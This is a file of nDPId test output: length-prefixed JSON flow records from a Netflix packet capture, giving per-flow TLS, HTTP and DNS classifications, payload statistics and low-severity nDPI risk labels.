+00817{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1484319114406,"flow_last_seen":1484319117555,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8880,"flow_avg_l4_payload_len":286,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00818{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1484319117651,"flow_last_seen":1484319117994,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8767,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319118657,"flow_last_seen":1484319120726,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":32245,"flow_avg_l4_payload_len":786,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53251,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319118658,"flow_last_seen":1484319120053,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":39341,"flow_avg_l4_payload_len":959,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1484319032865,"flow_last_seen":1484319032884,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":638,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319036827,"flow_last_seen":1484319036847,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1484319035079,"flow_last_seen":1484319073564,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10839,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1484319035080,"flow_last_seen":1484319073578,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":39376,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00817{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1484319035342,"flow_last_seen":1484319066108,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6543,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1484319114365,"flow_last_seen":1484319114400,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":638,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1484319117605,"flow_last_seen":1484319119338,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":26449,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00817{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1484319117826,"flow_last_seen":1484319118687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22434,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00816{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1484319117827,"flow_last_seen":1484319118041,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":4172,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319049641,"flow_last_seen":1484319049665,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319035004,"flow_last_seen":1484319035024,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51949,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319048757,"flow_last_seen":1484319048776,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319117511,"flow_last_seen":1484319117538,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319032882,"flow_last_seen":1484319032884,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52116,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319049645,"flow_last_seen":1484319049681,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52347,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1484319050652,"flow_last_seen":1484319052229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":41415,"flow_avg_l4_payload_len":781,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.145","src_port":53163,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1484319052216,"flow_last_seen":1484319054100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":43240,"flow_avg_l4_payload_len":745,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.10.139","src_port":53164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319054101,"flow_last_seen":1484319056189,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":43241,"flow_avg_l4_payload_len":786,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53171,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1484319056204,"flow_last_seen":1484319063297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21464,"flow_avg_l4_payload_len":429,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1484319056210,"flow_last_seen":1484319062135,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":28763,"flow_avg_l4_payload_len":587,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53173,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1484319056214,"flow_last_seen":1484319063597,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21524,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53174,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1484319056221,"flow_last_seen":1484319063369,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":26939,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53175,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":57,"flow_first_seen":1484319056232,"flow_last_seen":1484319064277,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24419,"flow_avg_l4_payload_len":428,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319056233,"flow_last_seen":1484319063283,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":25507,"flow_avg_l4_payload_len":463,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53177,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1484319056233,"flow_last_seen":1484319063789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24419,"flow_avg_l4_payload_len":469,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53178,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":1484319056234,"flow_last_seen":1484319063566,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":35980,"flow_avg_l4_payload_len":599,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53179,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319056241,"flow_last_seen":1484319062003,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24422,"flow_avg_l4_payload_len":444,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53180,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1484319056264,"flow_last_seen":1484319064524,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21416,"flow_avg_l4_payload_len":396,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53181,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1484319056264,"flow_last_seen":1484319063421,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":28764,"flow_avg_l4_payload_len":495,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53182,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":1307,"flow_first_seen":1484319064590,"flow_last_seen":1484319117695,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1155976,"flow_avg_l4_payload_len":884,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53183,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":178,"flow_first_seen":1484319064593,"flow_last_seen":1484319070693,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":145506,"flow_avg_l4_payload_len":817,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":788,"flow_first_seen":1484319070636,"flow_last_seen":1484319117609,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":707039,"flow_avg_l4_payload_len":897,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 